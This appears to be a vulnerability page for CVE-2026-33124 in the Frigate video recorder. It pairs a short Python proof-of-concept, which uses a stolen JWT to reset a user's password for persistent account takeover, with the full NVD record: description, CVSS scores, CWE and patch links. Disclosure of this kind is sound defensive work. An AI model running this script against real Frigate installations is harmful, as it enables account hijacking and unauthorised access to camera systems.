CVE-2026-33124

import requests # Target URL for the vulnerable endpoint target_url = "http://target-frigate-url/users/{username}/password" # The attacker needs a valid JWT token obtained through other means (e.g., XSS, Sniffing) stolen_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." headers = { "Authorization": f"Bearer {stolen_token}", "Content-Type": "application/json" } # Payload to change the password without providing the old one payload = { "password": "NewAttackerControlledPassword123!" } # Send the malicious request response = requests.put(target_url, headers=headers, json=payload) if response.status_code == 200: print("[+] Password changed successfully. Attacker can maintain access.") else: print(f"[-] Exploit failed: {response.text}")

{"cve": {"id": "CVE-2026-33124", "sourceIdentifier": "[email protected]", "published": "2026-03-20T10:16:18.870", "lastModified": "2026-03-23T15:50:07.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Versions prior to 0.17.0-beta1 allow any authenticated user to change their own password without verifying the current password through the /users/{username}/password endpoint. Changing a password does not invalidate existing JWT tokens, and there is no validation of password strength. If an attacker obtains a valid session token (e.g., via accidentally exposed JWT, stolen cookie, XSS, compromised device, or sniffing over HTTP), they can change the victim’s password and gain permanent control of the account. Since password changes do not invalidate existing JWT tokens, session hijacks persist even after a password reset. Additionally, the lack of password strength validation exposes accounts to brute-force attacks. This issue has been resolved in version 0.17.0-beta1."}, {"lang": "es", "value": "Frigate es un grabador de video en red (NVR) con detección local de objetos en tiempo real para cámaras IP. Las versiones anteriores a la 0.17.0-beta1 permiten a cualquier usuario autenticado cambiar su propia contraseña sin verificar la contraseña actual a través del endpoint /users/{username}/password. Cambiar una contraseña no invalida los tokens JWT existentes y no hay validación de la fortaleza de la contraseña. Si un atacante obtiene un token de sesión válido (por ejemplo, a través de un JWT expuesto accidentalmente, una cookie robada, XSS, un dispositivo comprometido o el rastreo por HTTP), puede cambiar la contraseña de la víctima y obtener control permanente de la cuenta. Dado que los cambios de contraseña no invalidan los tokens JWT existentes, los secuestros de sesión persisten incluso después de un restablecimiento de contraseña. Además, la falta de validación de la fortaleza de la contraseña expone las cuentas a ataques de fuerza bruta. Este problema se ha resuelto en la versión 0.17.0-beta1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.17.0", "matchCriteriaId": "C2130163-BC8A-4F42-9646-76319E812DDE"}]}]}], "references": [{"url": "https://github.com/blakeblackshear/frigate/commit/152e58520614610988bff3b6ff55d0aefd89c1b2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/blakeblackshear/frigate/security/advisories/GHSA-24p8-r573-vwr2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}